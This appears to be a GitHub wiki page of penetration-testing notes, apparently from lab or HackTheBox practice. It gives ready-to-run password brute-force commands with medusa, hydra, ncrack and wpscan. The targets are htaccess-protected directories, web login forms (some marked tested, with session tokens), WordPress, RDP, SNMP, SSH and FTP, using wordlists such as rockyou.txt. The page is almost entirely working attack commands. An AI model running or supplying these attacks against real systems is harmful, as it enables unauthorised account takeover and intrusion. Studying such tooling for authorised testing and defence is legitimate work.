-
Notifications
You must be signed in to change notification settings - Fork 14
Brute force networked services
- To use prepared password file and brute force network services such as HTTP, SSH, FTP...
- Directory for wordfile: /usr/share/wordlists or /usr/share/wordlists/metasploit (common-root.txt)
- Short one: /usr/share/wordlists/fasttrack.txt
- Long one: /usr/share/wordlists/rockyou.txt
Attack on htaccess protected web directory
medusa -h victim-ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10
Need to use BurpSuite to capture post request parameters
-
BurpSuite: https://github.com/lethanhtung01011980/Notes/wiki/Webapp-proxies
-
hydra -l admin -P /usr/share/wordlists/rockyou.txt victim-ip http-post-form "/backend/backend/auth/signin:_session_key=9QGD43r7Xdek5yh20YNcBLzVcHXxfaBKPNhnygC2&_token=R9TYkP5uOHhpGkojRqsHcdl2DIHqlCaficKdAjkm&postback=1&login=^USER^&password=^PASS^:F=Forgot"
-
(Tested) admin user:
hydra -l admin -P /usr/share/wordlists/rockyou.txt nineveh.htb http-post-form "/department/login.php:PHPSESSID=ephh03pnv3990cudqf5oev4g74&username=^USER^&password=^PASS^:F=Invalid"
-
PHP web:
hydra 10.10.10.43 -l user -P /usr/share/SecLists/Passwords/phpbb.txt https-post-form "/db/index.php:password=^PASS^&proc_login=true:Incorrect password"
-
(Tested) https, dummy admin user
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:PHPSESSID=me12tsm6h51u63io3llqmhid16&password=^PASS^&remember=no&login=Log+In&proc_login=true:F=Incorrect"
Do 'non-intrusive' checks ...
wpscan -u http://victim-ip
Do wordlist password brute force on enumerated users using 50 threads ...
wpscan -u http://victim-ip --wordlist /usr/share/wordlists/rockyou.txt --threads 50
Do wordlist password brute force on the 'admin' username only ...
wpscan -u http://victim-ip --wordlist /usr/share/wordlists/rockyou.txt --username admin
Attack on Windows RDP
ncrack -vv --user offsec -P password-file.txt rdp://victim-ip
Attack on SNMP. Can be use for other protocols
hydra -P password-file.txt -v victim-ip snmp
Attack on SSH
hydra -l root -P password-file.txt victim-ip ssh
- Single user and 10 threads:
medusa -h 10.11.1.116 -u root -P /usr/share/wordlists/rockyou.txt -M ftp -t 10
- Multiple users and passwords:
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp